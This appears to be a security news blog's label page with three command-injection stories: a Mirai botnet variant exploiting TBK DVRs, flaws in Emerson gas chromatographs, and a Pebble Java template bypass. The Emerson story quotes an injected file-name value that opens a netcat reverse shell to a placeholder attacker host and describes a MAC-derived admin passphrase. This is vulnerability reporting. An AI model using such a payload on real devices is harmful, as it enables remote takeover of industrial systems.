Search This Blog
Powered by Blogger.

Blog Archive

Labels

About Me

Load More
Trendy Right Now

Popular Posts

Showing posts with label Command Injection. Show all posts
Vulnerabilities and Exploits
Command Injection Linux Mirai botnet Netsecfish Vulnerabilities and Exploits

Mirai Botnet Variant is Building Swarm by Exploiting DVR Flaw

 

A command injection flaw in internet-connected digital video recorders used for CCTV monitoring is the target of a Mirai botnet malware variant, which allows hackers to take over the devices and add them to a botnet. 

Cybersecurity researchers at Russian cybersecurity firm Kaspersky discovered a CVE-2024-3721 exploit while analysing logs from their Linux honeypot system. The issue is a command injection vulnerability found in internet-connected digital video recorders used for CCTV surveillance. Further analysis revealed that the activity was related to a form of the Mirai botnet, which exploited this issue in TBK-manufactured DVR devices to compromise and control them. 

The vulnerability was initially discovered by security researcher "netsecfish" in April 2024. By adjusting parameters like mdb and mdc, the researcher released a proof-of-concept showing how a carefully designed post request to a specific URL can trigger shell command execution. Kaspersky confirmed that this precise technique is being utilised in the wild, with its Linux honeypots catching ongoing exploitation attempts linked to a Mirai botnet variant that uses netsecfish's proof-of-concept to compromise vulnerable DVRs. 

Nearly a decade ago, an anonymous source made the Mirai source code available online. It continues to act as the foundation for other evolving botnet efforts. The variant aimed at DVR systems expands on Mirai's initial foundation with extra features such as RC4-based string obfuscation, checks to avoid virtual machine environments, and anti-emulation methods. 

The exploit is used by the attackers to transmit a malicious ARM32 program to the target device, which then connects to a command-and-control server and joins the botnet. The infected device can be used to launch distributed denial-of-service attacks, forward malicious traffic, and engage in other malicious actions.

This Mirai variation uses a basic RC4 technique to decode its internal strings, with the decryption key disguised using XOR. After decryption, the strings are saved in a global list and used throughout runtime. To evade analysis, the virus runs anti-virtualization and anti-emulation checks on active processes for indicators of environments such as VMware or QEMU.

Last year, Netsecfish reported that around 114,000 DVR devices were vulnerable to CVE-2024-3721. Kaspersky estimates the figure to be closer to 50,000. The majority of infections associated with this Mirai variation are found in Brazil, Russia, Egypt, China, India, and Ukraine.
Read more »
sensitive data exposure
Authentication Bypass Command Injection Data Breach denial-of-service conditions Emerson gas chromatographs vulnerabilities sensitive data exposure

Critical Vulnerabilities in Emerson Gas Chromatographs Expose Sensitive Data

 

Researchers have discovered multiple critical vulnerabilities in Emerson gas chromatographs that could allow malicious actors to access sensitive data, cause denial-of-service conditions, and execute arbitrary commands. 

Gas chromatographs, essential for analyzing and separating chemical compounds, are widely used in various industries, including chemical, environmental, and healthcare sectors. The Emerson Rosemount 370XA, a popular model, uses a proprietary protocol for communication between the device and the technician's computer.

Claroty's Team82, a security research group specializing in operational technology, identified four significant vulnerabilities: two command injection flaws, an authentication bypass, and an authorization vulnerability. One of the command injection flaws received a CVSS v3 score of 9.8, marking it as critically severe.

The first vulnerability, tracked as CVE-2023-46687, is an unauthenticated remote code execution or command injection flaw found in the "forced calibration" command implementation. This flaw is tied to a system function that calls a constructed shell command with a user-provided file name without proper sanitization, allowing an attacker to inject arbitrary shell commands.

An attacker could exploit this by supplying crafted input such as gunzip -c ;nc -e /bin/sh ATTACKER_MACHINE 1337;> name_of_the_expanded_file, leading to arbitrary code execution in the root shell context.

The second vulnerability, CVE-2023-51761, is an authentication bypass that enables an attacker to bypass authentication by calculating a secret passphrase to reset the administrator password. The passphrase, derived from the device's MAC address, can be easily obtained. By understanding the passphrase validation process, an attacker can generate the passphrase using the MAC address and log in with administrator privileges using credentials formatted as EMERSON/{PASSPHRASE}.

Another flaw, CVE-2023-49716, involves a user login bypass via a password reset mechanism, allowing an unauthenticated user with network access to bypass authentication and gain admin capabilities.

The final vulnerability, CVE-2023-43609, is a command injection via reboot functionality, enabling an authenticated user with network access to execute arbitrary commands from a remote computer.

Due to the high cost and difficulty of acquiring a physical device, researchers emulated the Emerson Rosemount 370XA for their analysis. They discovered flaws in the device's protocol implementation, which allowed them to craft payloads and uncover the vulnerabilities.

The authentication bypass vulnerability, for example, allowed attackers to calculate a secret passphrase and reset administrator passwords, compromising system security.

In response to these findings, Emerson issued a security advisory recommending that users update the firmware on their devices. The Cybersecurity and Infrastructure Security Agency also released an advisory regarding these vulnerabilities.
Read more »
Vulnerabilities and Exploits
Command Injection Java Exploits Template Files Template Framework Vulnerabilities and Exploits

Critical Security Bug Detected in Java Template Framework Pebble

 

The vulnerability in Pebble, a Java templating engine could allow a hacker to circumvent its security safeguards and launch command injection assaults against host servers.  

Pebble Templates is primarily used to generate HTML text output but it can also employ to design CSS, XML, JS, etc. The templates are convenient because of their user-friendly web application templating system, internationalization capabilities, and security features like auto-escaping and a block-list method access validator that thwarts command execution assaults. 

However, a threat analyst at GitHub has identified that with the right code and template files, Pebble’s command execution defense can be bypassed easily. 

Circumventing Pebble Security 

The bypassing technology can work effectively when Pebble is utilized in combination with Spring, a well-known Java application framework. Multiple Spring classes are registered as beans, allowing them to be dynamically installed at runtime. The hacker can install one of the Spring objects that supports class loading by exploiting the Java beans engine. 

Subsequently, the malicious hacker can employ Jackson, a data-parsing library, to read an XML file containing the details of a class to instantiate and a function to operate. This allows a threat actor a window to execute arbitrary code on the host server. 

As a proof of concept, the security analyst installed an XML file from the internet employing a Pebble template, then instantiated a Java class that supported implementing server-side system commands. 

No easy solution yet 

The security bug report has sparked conversation among GitHub researchers. Due to the vulnerability’s CVE designation, business systems that rely on the latest version of Pebble are receiving security alerts.

The maintainers are working on a fix, but since it is a community-driven project, it remains unclear when it will be published. The developers have issued a few temporary workarounds to safeguard projects in the interim. 

It is worth noting that to exploit the bug, an attacker would need to have a way to upload a malicious Pebble template on the server. Hence, organizations must enhance security checks on user-provided content and limit template uploads. Businesses can also employ sanitization techniques to spot and mitigate malicious content before using it in the template.
Read more »
Subscribe to: Posts (Atom)